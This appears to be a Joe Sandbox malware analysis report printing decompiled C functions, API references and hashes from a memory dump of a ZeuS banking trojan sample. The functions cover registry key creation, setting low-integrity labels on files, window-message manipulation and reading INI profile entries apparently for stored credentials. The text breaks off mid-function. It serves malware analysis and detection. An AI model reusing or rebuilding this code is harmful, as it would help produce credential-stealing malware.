Function 00409700, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409700(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E00409565(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x00409725
0x00409728
0x0040972a
0x0040972c
0x00409735
0x00409738
0x00409741
0x0040975e
0x00000000
0x00409760
0x00409763
0x00409769
0x00409776
0x00000000
0x00000000
0x00000000
0x00409769
0x0040977a
0x0040977d
0x00000000
0x0040976b
0x0040976b
0x0040976e
0x00000000
0x00409774
0x00409780
0x00409786

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00409728

Part of subcall function 00409565: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00409686

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0040975A
RegCloseKey.ADVAPI32(?), ref: 00409763
RegCloseKey.ADVAPI32(?), ref: 0040977D

Strings

d, xrefs: 0040976E
SOFTWARE\Microsoft, xrefs: 0040971B

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: 2b9c93a098483c532e3eb310db293f4abdf10b192bc54bd7db778e8cb5f2484a
Instruction ID: d858c4e74f3f53b2e73707feb907b40dd9e69712d5719015d1b31e5b6215471d
Opcode Fuzzy Hash: 2b9c93a098483c532e3eb310db293f4abdf10b192bc54bd7db778e8cb5f2484a
Instruction Fuzzy Hash: 0B115EB694020CFEEB019F948C80EEFBB7CEB15388F104076F901B21A1D2759E458B75

Uniqueness

Uniqueness Score: -1.00%

Function 00417C9B, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417C9B(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				void* __esi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x423460 == 0) {
					E0041CC9C(__ecx, 0x423460, 0x423668, 2);
					 *((short*)(E00405222(0x423668, 0x423460, E00405D35(0x423460) + _t10) + 0x423668)) = 0;
					_t3 = PathRemoveFileSpecW(0x423668);
				}
				if(_t13 != 0) {
					E00405587(_t3 | 0xffffffff, 0x423460, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x423c1c > 1) {
					E0040A7F9(0x423668);
					E00408867(0x423668);
					_t3 = GetFileAttributesW(0x423460);
					if(_t3 != 0xffffffff) {
						return E00408867(0x423460);
					}
				}
				return _t3;
			}

0x00417c9b
0x00417caf
0x00417cb3
0x00417ccc
0x00417cd3
0x00417cd3
0x00417cdb
0x00417ce4
0x00417cef
0x00417cef
0x00417cfa
0x00417d06
0x00417d0c
0x00417d12
0x00417d1b
0x00000000
0x00417d1e
0x00417d1b
0x00417d25

APIs

PathRemoveFileSpecW.SHLWAPI(00423668,00423668,00423460,00000000,00000002,00000000,00020000,00418795,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722), ref: 00417CD3
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00418795,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000,?), ref: 00417CEF
GetFileAttributesW.KERNEL32(00423460,00423668,00423668,00000000,00020000,00418795,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000), ref: 00417D12

Part of subcall function 0041CC9C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17

Strings

h6B, xrefs: 00417CAA
.tmp, xrefs: 00417CE9
`4B, xrefs: 00417CA5

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp$`4B$h6B
API String ID: 3627892477-597483022
Opcode ID: d01f92a560e55bda1954e5a8868900820e2f08189a71fab542b0edfb9946eb78
Instruction ID: 6651383e98d92d9121988f7bbc1ca41a8fde8f18cbbeb77b5354ac410e1d928d
Opcode Fuzzy Hash: d01f92a560e55bda1954e5a8868900820e2f08189a71fab542b0edfb9946eb78
Instruction Fuzzy Hash: 7FF0623170415035E2213B36AC49ABF167A8F91729F54867FB111B22E1DF7C49838E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408867, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00408867(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E004068B2(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x00408873
0x00408875
0x0040887b
0x00408886
0x0040888e
0x0040889f
0x004088a2
0x004088aa
0x004088b9
0x004088c1
0x004088c3
0x004088c3
0x004088c1
0x004088c8
0x004088c8
0x004088d2

APIs

Part of subcall function 004068B2: GetCurrentThread.KERNEL32 ref: 004068C2
Part of subcall function 004068B2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068C9
Part of subcall function 004068B2: OpenProcessToken.ADVAPI32(000000FF,00000020,0040C177,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068DB

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00408886
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 004088A2
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 004088B9
LocalFree.KERNEL32(00000000), ref: 004088C8

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00408881
SeSecurityPrivilege, xrefs: 0040886E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: 5cc411d04f1cd8e15bf7a529ab88b28542dc25dad19593ea62b464028fde4b5f
Instruction ID: 6123b2fb75b7a6f4906dbc7282b59584570ed6b19090230ffd0c374b448859c8
Opcode Fuzzy Hash: 5cc411d04f1cd8e15bf7a529ab88b28542dc25dad19593ea62b464028fde4b5f
Instruction Fuzzy Hash: 9A0181B660020CBFEF10AFA0CE85EEF7B7CEB04740F004076B541B11A1DB759A549A28

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAD1, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040EAD1(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E0040E9F2(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E0040E862(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E0040E862(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0040D6A0(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E0040E9F2(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x0040ead1
0x0040ead4
0x0040ead8
0x0040eadb
0x0040eae3
0x0040eb00
0x0040eb08
0x00000000
0x00000000
0x0040eb0a
0x0040eb25
0x0040eb2d
0x0040eb43
0x00000000
0x00000000
0x00000000
0x00000000
0x0040eb49
0x0040eb49
0x0040eb49
0x0040eb5f
0x0040eb67
0x0040eb6e
0x0040eb99
0x0040eb9e
0x0040eba1
0x0040eba4
0x0040ecbb
0x0040ecbe
0x0040ed03
0x0040ed08
0x0040ed33
0x0040ed38
0x0040ec52
0x0040ec56
0x0040ec56
0x0040ed3e
0x0040ed40
0x0040ed40
0x0040ed43
0x00000000
0x00000000
0x0040ed49
0x0040ed4c
0x0040ec41
0x0040ec41
0x0040ec47
0x0040ec48
0x0040ec4d
0x0040ec50
0x00000000
0x0040ec50
0x0040ed52
0x0040ed52
0x0040ed55
0x0040ed58
0x00000000
0x0040ed58
0x0040ed0d
0x0040ed10
0x0040ed15
0x00000000
0x00000000
0x0040ed22
0x0040ed2e
0x00000000
0x0040ed2e
0x0040ecc0
0x0040ec0f
0x0040ec0f
0x0040ec12
0x0040eb8d
0x0040eb8d
0x00000000
0x0040eb8d
0x0040ecc6
0x0040ecc9
0x0040ec7d
0x0040ec7d
0x0040ec82
0x0040ec96
0x0040ec96
0x00000000
0x0040ec82
0x0040eccb
0x0040ecce
0x0040ecee
0x0040ecf3
0x0040ebe7
0x0040ebe7
0x0040ebec
0x0040ebec
0x00000000
0x00000000
0x00000000
0x0040ebee
0x0040ec3c
0x0040ec3c
0x00000000
0x0040ec3c
0x0040ecd0
0x0040ecd3
0x00000000
0x00000000
0x0040ecd9
0x0040ecde
0x00000000
0x00000000
0x0040ece4
0x00000000
0x0040ece4
0x0040ebaa
0x0040ec9d
0x0040eca2
0x00000000
0x00000000
0x0040eca8
0x0040ecab
0x0040ecb2
0x00000000
0x00000000
0x0040ecb4
0x00000000
0x0040ecb4
0x0040ebb0
0x0040ebb3
0x0040ec6b
0x0040ec70
0x00000000
0x00000000
0x0040ec72
0x0040ec77
0x00000000
0x00000000
0x00000000
0x0040ec77
0x0040ebb9
0x0040ebbc
0x0040ec35
0x0040ec3a
0x0040ec59
0x0040ec5e
0x00000000
0x00000000
0x0040ec64
0x00000000
0x0040ec64
0x00000000
0x0040ec3a
0x0040ebbe
0x0040ebc1
0x0040ec18
0x0040ec1d
0x0040ec28
0x0040ec2d
0x00000000
0x00000000
0x0040ec2f
0x0040ec31
0x0040ec23
0x0040ec23
0x00000000
0x0040ec23
0x0040ec1f
0x0040ec21
0x00000000
0x0040ec21
0x0040ebc6
0x0040ebc9
0x00000000
0x00000000
0x0040ebcb
0x0040ebd0
0x0040ec04
0x0040ec09
0x0040ec0c
0x00000000
0x0040ec0c
0x0040ebd2
0x0040ebd7
0x00000000
0x00000000
0x0040ebd9
0x0040ebde
0x00000000
0x00000000
0x0040ebe0
0x0040ebe5
0x00000000
0x00000000
0x00000000
0x0040ebe5
0x0040eb76
0x0040eb7b
0x0040eb81
0x0040eb88
0x00000000
0x0040eb88

APIs

GetAncestor.USER32(?,00000002), ref: 0040EAFA
SendMessageTimeoutW.USER32 ref: 0040EB25
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040EB67
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EBFD
PostMessageW.USER32(?,00000112,?,?), ref: 0040EC50
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EC8F

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: c78ea9d9b23a228309be7845c3810fe23e7c57ff3c2467d3b32d347d8d4af1d2
Instruction ID: b2c266d80627c8065ebe80120cc70b6316188c4abb24ea71180ffee9d33726d8
Opcode Fuzzy Hash: c78ea9d9b23a228309be7845c3810fe23e7c57ff3c2467d3b32d347d8d4af1d2
Instruction Fuzzy Hash: 8451B171608205AAFF345A1ACC85BBE3665EB05340F240C37F942F62E1C27EDCE1A65A

Uniqueness

Uniqueness Score: -1.00%

Function 00414366, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00414366(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E0040AA77( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E004051B6(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E004051E6(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E00406096(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E004051B6(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E0040F34A(_t61,  &_v584);
						_t63 = 0x73;
						E0040F34A(_t63,  &_v596);
						_t65 = 0x74;
						E0040F34A(_t65,  &_v608);
						_t67 = 0x75;
						E0040F34A(_t67,  &_v624);
						_t69 = 0x76;
						E0040F34A(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E004060D2(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E00405D35(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E0040F34A(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E00405ED9(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E004055DA(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E004051E6(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E0041432E(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x0041436c
0x0041438a
0x00414580
0x00414588
0x00414588
0x00414390
0x00414393
0x004143b4
0x004143b8
0x004143bc
0x004143be
0x00000000
0x00000000
0x004143db
0x004143dd
0x004143df
0x0041457a
0x0041457b
0x00000000
0x0041457b
0x004143e5
0x004143ea
0x004143ef
0x004143f1
0x00000000
0x00000000
0x00414401
0x00414403
0x00414407
0x00414409
0x0041440f
0x00414417
0x0041441b
0x00414423
0x00414424
0x0041442f
0x00414430
0x0041443b
0x0041443c
0x00414447
0x00414448
0x00414453
0x00414454
0x00414459
0x00414556
0x0041455c
0x00414561
0x00414565
0x00414567
0x0041445b
0x0041445f
0x00414468
0x0041446e
0x00414470
0x00414490
0x00414492
0x00414494
0x004144ad
0x004144b3
0x004144b8
0x004144bd
0x004144cc
0x004144de
0x004144e0
0x004144e2
0x004144ed
0x004144ed
0x004144ff
0x00414501
0x00414503
0x00414507
0x0041450c
0x0041450e
0x00414512
0x00414516
0x00414517
0x0041451c
0x00414520
0x00414526
0x00414530
0x00414531
0x00414538
0x0041453d
0x00414540
0x00414542
0x00414544
0x0041454a
0x0041454f
0x00414551
0x00414553
0x00414553
0x00414553
0x00414553
0x00414551
0x00414542
0x0041450e
0x00414503
0x004144e2
0x004144bd
0x00414494
0x00000000
0x00414470
0x00414571
0x00414576
0x00414576
0x00000000
0x00414395
0x004143a0
0x00000000
0x004143a0

APIs

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

GetPrivateProfileStringW.KERNEL32 ref: 004143DB
StrStrIW.SHLWAPI(?,?), ref: 00414468
GetPrivateProfileStringW.KERNEL32 ref: 00414490
GetPrivateProfileIntW.KERNEL32 ref: 004144AD
GetPrivateProfileStringW.KERNEL32 ref: 004144DE

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: bf0a9294d8a7f098b0cb978180706d68efbb4c96a3df6d8b9cb7a13658a704fd
Instruction ID: 983498ebd1e8d0212289d6975de336a777fdd2abd83d2f322fb40bc98a9e532e
Opcode Fuzzy Hash: bf0a9294d8a7f098b0cb978180706d68efbb4c96a3df6d8b9cb7a13658a704fd
Instruction Fuzzy Hash: 83518632504306ABD710DA559C01EEBB7E9EFC4714F00093EBA98E7191DB38E94587AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041651A, Relevance: 9.2, APIs: 6, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041651A(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x423420);
				_t99 = _a4;
				_t55 = E00415D7F( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x423420);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x423438;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E0040656B(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E00405222(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x423420);
					_v5 = E00416401( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x423420);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E00415D7F( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E004051E6(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x423438;
					_t101 = E0040731C( &_v24, _t105);
					_t79 = E00412174( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E004051E6(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E00405426(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E004051B6(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E004051E6(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
